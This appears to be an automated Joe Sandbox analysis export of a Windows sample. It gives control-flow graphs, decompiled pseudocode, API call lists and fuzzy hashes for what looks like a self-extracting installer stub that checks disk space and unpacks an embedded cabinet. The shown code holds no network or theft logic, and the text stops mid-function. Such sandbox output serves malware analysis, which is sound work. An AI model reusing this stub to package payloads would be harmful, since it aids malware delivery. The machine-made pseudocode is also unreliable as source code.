                                                                                                                                                                                                        control_flow_graph 324 1f597d-1f59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1f59dd-1f5a1b GetDiskFreeSpaceA 324->325 326 1f59bb-1f59d8 call 1f44b9 call 1f6285 324->326 328 1f5ba1-1f5bde memset call 1f6285 GetLastError FormatMessageA 325->328 329 1f5a21-1f5a4a MulDiv 325->329 343 1f5c05-1f5c14 call 1f6ce0 326->343 339 1f5be3-1f5bfc call 1f44b9 SetCurrentDirectoryA 328->339 329->328 332 1f5a50-1f5a6c GetVolumeInformationA 329->332 335 1f5a6e-1f5ab0 memset call 1f6285 GetLastError FormatMessageA 332->335 336 1f5ab5-1f5aca SetCurrentDirectoryA 332->336 335->339 337 1f5acc-1f5ad1 336->337 341 1f5ad3-1f5ad8 337->341 342 1f5ae2-1f5ae4 337->342 351 1f5c02 339->351 341->342 346 1f5ada-1f5ae0 341->346 348 1f5ae7-1f5af8 342->348 349 1f5ae6 342->349 346->337 346->342 353 1f5af9-1f5afb 348->353 349->348 354 1f5c04 351->354 355 1f5afd-1f5b03 353->355 356 1f5b05-1f5b08 353->356 354->343 355->353 355->356 357 1f5b0a-1f5b1b call 1f44b9 356->357 358 1f5b20-1f5b27 356->358 357->351 360 1f5b29-1f5b33 358->360 361 1f5b52-1f5b5b 358->361 360->361 364 1f5b35-1f5b50 360->364 362 1f5b62-1f5b6d 361->362 365 1f5b6f-1f5b74 362->365 366 1f5b76-1f5b7d 362->366 364->362 367 1f5b85 365->367 368 1f5b7f-1f5b81 366->368 369 1f5b83 366->369 370 1f5b87-1f5b94 call 1f268b 367->370 371 1f5b96-1f5b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E001F597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E001F44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0x1f9a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0x1f9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0x1f9a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0x1f89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x1f9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E001F268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x1f9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x1f89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1f89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x1f9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E001F44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x1f9124 = E001F6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E001F44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x1f9124 = E001F6285();
					_t66 = 0;
					L33:
					return E001F6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                        0x001f5aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f59bb
                                                                                                                                                                                                        0x001f59c0
                                                                                                                                                                                                        0x001f59c7
                                                                                                                                                                                                        0x001f59d1
                                                                                                                                                                                                        0x001f59d6
                                                                                                                                                                                                        0x001f5c05
                                                                                                                                                                                                        0x001f5c14
                                                                                                                                                                                                        0x001f5c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001F59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 001F59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 001F5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 001F5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001F5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001F5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 001F5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 001F5BFC
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: c97e5b7f6b8ee9df9c045044623290bf22bc2c0eebca2f2ac1b39ad34bcabc2b
                                                                                                                                                                                                        • Instruction ID: 8d7f30e94c070faf6b2c0d75cad2e2aecefaf72a92aa4cc4ca6545f8fe889b3f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c97e5b7f6b8ee9df9c045044623290bf22bc2c0eebca2f2ac1b39ad34bcabc2b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B7190B190060CAFEB15DB60DC85FFB77AEEB48344F5440AAF64AD6580DB749E85CB20
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 1f4fe0-1f501a call 1f468f FindResourceA LoadResource LockResource 377 1f5161-1f5163 374->377 378 1f5020-1f5027 374->378 379 1f5029-1f5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 1f5057-1f505e call 1f4efd 378->380 379->380 383 1f507c-1f50b4 380->383 384 1f5060-1f5077 call 1f44b9 380->384 389 1f50e8-1f5104 call 1f44b9 383->389 390 1f50b6-1f50da 383->390 388 1f5107-1f510e 384->388 392 1f511d-1f511f 388->392 393 1f5110-1f5117 FreeResource 388->393 402 1f5106 389->402 401 1f50dc 390->401 390->402 394 1f513a-1f5141 392->394 395 1f5121-1f5127 392->395 393->392 399 1f515f 394->399 400 1f5143-1f514a 394->400 395->394 398 1f5129-1f5135 call 1f44b9 395->398 398->394 399->377 400->399 404 1f514c-1f5159 SendMessageA 400->404 405 1f50e3-1f50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E001F4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0x1f9144 = E001F468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0x1f9140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0x1f8584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E001F4EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E001F4CA0, E001F4CC0, E001F4980, E001F4A50, E001F4AD0, E001F4B60, E001F4BC0, 1, 0x1f9148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0x1f9148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        						E001F44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0x1f1140, 0, E001F4CD0, 0, 0x1f9140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        					E001F44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0x1f9140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0x1f9140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0x1f91d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E001F44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0x1f8a38 & 0x00000001) == 0 && ( *0x1f9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0x1f8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 001F4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 001F5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 001F500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 001F5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 001F5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 001F504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 001F5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 001F5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 001F5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 3407e652b029c0585d8b29ebaebdcdaeef9fc01e0b8dafac6a4a41ae842c0fcc
                                                                                                                                                                                                        • Instruction ID: 83771300750df001a8a5a1bd0855a555b0e166c4b2e0563755b8bc3f19dadb0f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3407e652b029c0585d8b29ebaebdcdaeef9fc01e0b8dafac6a4a41ae842c0fcc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5931E8F07447097FE7206B65AD89F77365DBB44755F040024FB09A29A1DFB99C80C664
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 1f44b9-1f44f8 407 1f44fe-1f4525 LoadStringA 406->407 408 1f4679-1f467b 406->408 409 1f4527-1f452e call 1f681f 407->409 410 1f4562-1f4568 407->410 411 1f467c-1f468c call 1f6ce0 408->411 418 1f453f 409->418 419 1f4530-1f453d call 1f67c9 409->419 414 1f456b-1f4570 410->414 414->414 417 1f4572-1f457c 414->417 420 1f457e-1f4580 417->420 421 1f45c9-1f45cb 417->421 425 1f4544-1f4554 MessageBoxA 418->425 419->418 419->425 426 1f4583-1f4588 420->426 423 1f45cd-1f45cf 421->423 424 1f4607-1f4617 LocalAlloc 421->424 428 1f45d2-1f45d7 423->428 429 1f455a-1f455d 424->429 430 1f461d-1f4628 call 1f1680 424->430 425->429 426->426 431 1f458a-1f458c 426->431 428->428 432 1f45d9-1f45ed LocalAlloc 428->432 429->411 437 1f462d-1f463d MessageBeep call 1f681f 430->437 434 1f458f-1f4594 431->434 432->429 436 1f45f3-1f4605 call 1f171e 432->436 434->434 435 1f4596-1f45ad LocalAlloc 434->435 435->429 438 1f45af-1f45c7 call 1f171e 435->438 436->437 444 1f463f-1f464c call 1f67c9 437->444 445 1f464e 437->445 438->437 444->445 448 1f4653-1f4677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0x1f8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0x1f9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E001F1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
